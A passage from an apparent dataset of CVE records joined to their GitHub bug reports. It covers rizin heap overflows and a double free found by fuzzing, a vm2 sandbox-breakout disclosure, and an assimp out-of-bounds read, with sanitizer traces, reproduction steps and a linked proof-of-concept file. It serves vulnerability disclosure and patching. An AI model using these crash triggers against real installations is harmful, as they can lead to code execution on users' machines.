get_set_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:624:8 #4 0xd0dd06 in get_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:1102:9 #5 0xd0d316 in get_sections_symbols_from_code_objects /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:1197:38 #6 0xb6a06e in symbols /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_pyc.c:129:2 #7 0xae7bf4 in rz_bin_object_set_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:455:16 #8 0xae706b in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:319:2 #9 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19 #10 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8 #11 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18 #12 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23 #13 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4 #14 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14 #15 0x7f4055fa8082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #16 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:345:9 in get_complex_object ==2489412==ABORTING ```
Multiple heap out-of-bounds writes of size 1 in marshal.c
https://api.github.com/repos/rizinorg/rizin/issues/2963/comments
1
2022-08-22T11:08:29Z
2022-08-24T00:26:43Z
https://github.com/rizinorg/rizin/issues/2963
1,346,224,089
2,963
4,100
CVE-2022-36041
2022-09-06T20:15:08.673
Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when parsing Mach-O files. A user opening a malicious Mach-O file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 7323e64d68ecccfb0ed3ee480f704384c38676b2 contains a patch.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/7323e64d68ecccfb0ed3ee480f704384c38676b2" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2956" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-2c7m-2f37-mr5m" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/7323e64d68ecccfb0ed3ee480f704384c38676b2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2956" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-2c7m-2f37-mr5m" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA", "versionEndExcluding": null, "versionEndIncluding": "0.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rizinorg/rizin/issues/2956
[ "Third Party Advisory" ]
github.com
[ "rizinorg", "rizin" ]
Hi! We've been fuzzing your project and found the following error in `librz/bin/format/mach0/mach0.c` ### Work environment OS: Ubuntu 20.04 File format: - rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9 ### Bug description Heap out-of-bounds write of size 2 in `librz/bin/format/mach0/mach0.c:1612` ### Steps to reproduce 1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .` 2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash` 3. Execute rizin with crashing input (we sent all crashing inputs to you by email): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-6e26c88ac8552738277a17561f1ddcafe3b04e6e` 4. You will see the following output: ``` ================================================================= ==2478981==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001af852 at pc 0x000000c5c71d bp 0x7ffdd3ff06f0 sp 0x7ffdd3ff06e8 WRITE of size 2 at 0x6020001af852 thread T0 #0 0xc5c71c in reconstruct_chained_fixup /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:1612:39 #1 0xc5c71c in init_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2041:3 #2 0xc32de1 in init /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2050:7 #3 0xc32de1 in new_buf_64 /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2123:8 #4 0xb3548a in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_mach0.c:47:30 #5 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8 #6 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19 #7 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8 #8 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18 #9 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23 #10 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4 #11 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14 #12 0x7f601eb77082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d) 0x6020001af852 is located 0 bytes to the right of 2-byte region [0x6020001af850,0x6020001af852) allocated by thread T0 here: #0 0x498c9d in malloc (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498c9d) #1 0xc57e72 in reconstruct_chained_fixup /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:1600:30 #2 0xc57e72 in init_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2041:3 #3 0xc32de1 in init /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2050:7 #4 0xc32de1 in new_buf_64 /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:2123:8 #5 0xb3548a in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_mach0.c:47:30 #6 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/mach0/mach0.c:1612:39 in reconstruct_chained_fixup Shadow bytes around the buggy address: 0x0c048002deb0: fa fa 06 fa fa fa 00 03 fa fa 06 fa fa fa 00 03 0x0c048002dec0: fa fa 06 fa fa fa 00 03 fa fa 06 fa fa fa 00 03 0x0c048002ded0: fa fa 06 fa fa fa 00 03 fa fa 06 fa fa fa 00 03 0x0c048002dee0: fa fa 06 fa fa fa 06 fa fa fa 06 fa fa fa 00 00 0x0c048002def0: fa fa 06 fa fa fa 00 05 fa fa 06 fa fa fa fd fa =>0x0c048002df00: fa fa 00 04 fa fa 00 02 fa fa[02]fa fa fa fa fa 0x0c048002df10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002df20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002df30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002df40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002df50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2478981==ABORTING ```
Heap out-of-bounds write in mach0.c
https://api.github.com/repos/rizinorg/rizin/issues/2956/comments
2
2022-08-22T10:50:17Z
2022-08-24T00:26:44Z
https://github.com/rizinorg/rizin/issues/2956
1,346,201,672
2,956
4,101
CVE-2022-36043
2022-09-06T20:15:08.740
Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to a double free in bobj.c:rz_bin_reloc_storage_free() when freeing relocations generated from qnx binary plugin. A user opening a malicious qnx binary could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number a3d50c1ea185f3f642f2d8180715f82d98840784 contains a patch for this issue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/a3d50c1ea185f3f642f2d8180715f82d98840784" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2964" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-rjhv-mj4g-j4p5" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/a3d50c1ea185f3f642f2d8180715f82d98840784" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2964" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-rjhv-mj4g-j4p5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA", "versionEndExcluding": null, "versionEndIncluding": "0.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/rizinorg/rizin/issues/2964
[ "Third Party Advisory" ]
github.com
[ "rizinorg", "rizin" ]
Hi! We've been fuzzing your project and found the following error in `librz/bin/bobj.c:142` ### Work environment OS: Ubuntu 20.04 File format: - rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9 ### Bug description Heap double-free in `librz/bin/bobj.c:142:3` ### Steps to reproduce 1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .` 2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash` 3. Execute rizin with crashing input (we sent all crashing inputs to you by email): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-ec0c253b75cf3a89faf1b217cb8f94463852493c` 4. You will see the following output: ``` ================================================================= ==2491485==ERROR: AddressSanitizer: attempting double-free on 0x60600003fa40 in thread T0: #0 0x498a32 in free (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498a32) #1 0xae69c3 in rz_bin_reloc_storage_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:142:3 #2 0xae69c3 in rz_bin_object_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:201:2 #3 0xad73c7 in rz_bin_file_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:64:2 #4 0x4fcf7a in rz_list_delete /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:166:3 #5 0x4fcf7a in rz_list_purge /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:126:3 #6 0x4fcf7a in rz_list_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:139:3 #7 0xadffdd in rz_bin_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:449:2 #8 0x10254a9 in rz_core_fini /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/core.c:2658:2 #9 0x1025b48 in rz_core_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/core.c:2684:2 #10 0x5b6ac6 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1503:2 #11 0x7fe47324a082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d) 0x60600003fa40 is located 0 bytes inside of 64-byte region [0x60600003fa40,0x60600003fa80) freed by thread T0 here: #0 0x498a32 in free (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498a32) #1 0x4fcf7a in rz_list_delete /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:166:3 #2 0x4fcf7a in rz_list_purge /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:126:3 #3 0x4fcf7a in rz_list_free /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/util/list.c:139:3 previously allocated by thread T0 here: #0 0x498e12 in calloc (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498e12) #1 0xb6b102 in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_qnx.c:131:22 #2 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8 SUMMARY: AddressSanitizer: double-free (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498a32) in free ==2491485==ABORTING ```
double-free in bobj.c
https://api.github.com/repos/rizinorg/rizin/issues/2964/comments
2
2022-08-22T11:11:15Z
2022-08-24T00:26:42Z
https://github.com/rizinorg/rizin/issues/2964
1,346,227,624
2,964
4,102
CVE-2022-36067
2022-09-06T22:15:09.207
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. In versions prior to version 3.9.11, a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.11 of vm2. There are no known workarounds.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/issues/467" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20221017-0002/" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/blob/master/lib/setup-sandbox.js#L71" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/commit/d9a7f3cc995d3d861e1380eafb886cb3c5e2b873#diff-b1a515a627d820118e76d0e323fe2f0589ed50a1eacb490f6c3278fe3698f164" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/issues/467" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20221017-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "3CB151FD-32BF-4CED-93D3-F07D6F62E4DC", "versionEndExcluding": "3.9.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "913" ]
913
https://github.com/patriksimek/vm2/issues/467
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "patriksimek", "vm2" ]
Hello 👋 The [Oxeye](https://www.oxeye.io/) research team has found a sandbox breakout vulnerability in VM2. We would like to share the in-depth analysis with you so the vulnerability can be fixed. We tried to contact `security@integromat.com` but didn't get any response. Could you please share with me an email address to keep the issue private? Best, Oxeye Research Team
Sandbox Breakout in VM2
https://api.github.com/repos/patriksimek/vm2/issues/467/comments
18
2022-08-28T09:52:15Z
2022-09-15T02:53:51Z
https://github.com/patriksimek/vm2/issues/467
1,353,303,106
467
4,103
CVE-2022-38528
2022-09-06T23:15:08.880
Open Asset Import Library (assimp) commit 3c253ca was discovered to contain a segmentation violation via the component Assimp::XFileImporter::CreateMeshes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/assimp/assimp/issues/4662" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Technical Description", "Third Party Advisory" ], "url": "https://github.com/assimp/assimp/issues/4662" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:assimp:assimp:5.2.5:*:*:*:*:*:*:*", "matchCriteriaId": "19513059-3423-47C9-B7A3-38B8ACA2A7B2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/assimp/assimp/issues/4662
[ "Exploit", "Issue Tracking", "Technical Description", "Third Party Advisory" ]
github.com
[ "assimp", "assimp" ]
# Describe the bug SEGV on unknown address still exists in Assimp::XFileImporter::CreateMeshes. ***This is similar to issue https://github.com/assimp/assimp/issues/1728. Note that #1728 reported wrong type of the vulnerability, as it is not a NULL pointer dereference. Patch https://github.com/assimp/assimp/commit/39ce3e1309b50681ea24b3109971582003fa83d5 was misguided by #1728, leaving this vulnerability unfixed.*** # To Reproduce Steps to reproduce the behavior: **version:** latest commit https://github.com/assimp/assimp/commit/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac **poc:**[null_CreateMeshes.zip](https://github.com/assimp/assimp/files/9190065/null_CreateMeshes.zip) ``` git clone https://github.com/assimp/assimp.git cd assimp mkdir build cd build CFLAGS="-g -O0" CXXFLAGS="-g -O0" cmake -G "Unix Makefiles" -DBUILD_SHARED_LIBS=OFF -DASSIMP_BUILD_ASSIMP_TOOLS=ON .. ./assimp info $POC ``` # Expected behavior ``` user@c3ae4d510abb:$ ./bin/assimp info poc Launching asset import ... OK Validating postprocessing flags ... OK 0 % Segmentation fault (core dumped) ``` ``` user@c3ae4d510abb:$ ./bin/assimp info poc Launching asset import ... OK Validating postprocessing flags ... OK 0 % AddressSanitizer:DEADLYSIGNAL ================================================================= ==20088==ERROR: AddressSanitizer: SEGV on unknown address 0x6120000301c0 (pc 0x555556872ed9 bp 0x7fffffffb4d0 sp 0x7fffffffb100 T0) ==20088==The signal is caused by a READ memory access. #0 0x555556872ed8 (bin/assimp+0x131eed8) #1 0x55555687151a (bin/assimp+0x131d51a) #2 0x5555568716a0 (bin/assimp+0x131d6a0) #3 0x555556870ba0 (bin/assimp+0x131cba0) #4 0x555556870829 (bin/assimp+0x131c829) #5 0x555555c56ab5 (bin/assimp+0x702ab5) #6 0x55555580ecf2 (bin/assimp+0x2bacf2) #7 0x5555557f89af (bin/assimp+0x2a49af) #8 0x5555557f5f42 (bin/assimp+0x2a1f42) #9 0x555555801399 (bin/assimp+0x2ad399) #10 0x5555557f59c8 (bin/assimp+0x2a19c8) #11 0x7ffff7070082 (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #12 0x5555557cda7d (bin/assimp+0x279a7d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (bin/assimp+0x131eed8) ==20088==ABORTING Aborted ``` # Vulnerability analysis Using gdb to trace this PoC, the vulnerability occurs in line 340 of XFileImporter.cpp, due to `idx=16256` is larger than the capacity of `sourceMesh->mNormals` (24). https://github.com/assimp/assimp/blob/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac/code/AssetLib/X/XFileImporter.cpp#L337-L342 After tracing it, I found that `pMesh->mNormals` assigned `numNormals` elements in line 514-519 of `XFileParser.cpp`, then line 535-536 saved the result of `ReadInt` to `pMesh->mNormFaces[a].mIndices` without checking if it is in the correct boundary (`<numNormals`). This eventually leads to the bug above. https://github.com/assimp/assimp/blob/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac/code/AssetLib/X/XFileParser.cpp#L513-L541 # Suggested fix Add a boundary check after `ReadInt` following the convention in line 410 below. Line 410 ensures the number read by `ReadInt` does not exceed the size of the vector. https://github.com/assimp/assimp/blob/3c253ca3e5be69dc0eb7e9120278cd0a74deb9ac/code/AssetLib/X/XFileParser.cpp#L394-L415
Bug: SEGV on unknown address still exists in Assimp::XFileImporter::CreateMeshes
https://api.github.com/repos/assimp/assimp/issues/4662/comments
2
2022-07-26T13:16:46Z
2025-05-23T16:56:35Z
https://github.com/assimp/assimp/issues/4662
1,318,230,977
4,662
4,104
CVE-2022-38529
2022-09-06T23:15:08.920
tinyexr commit 0647fb3 was discovered to contain a heap-buffer overflow via the component rleUncompress.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
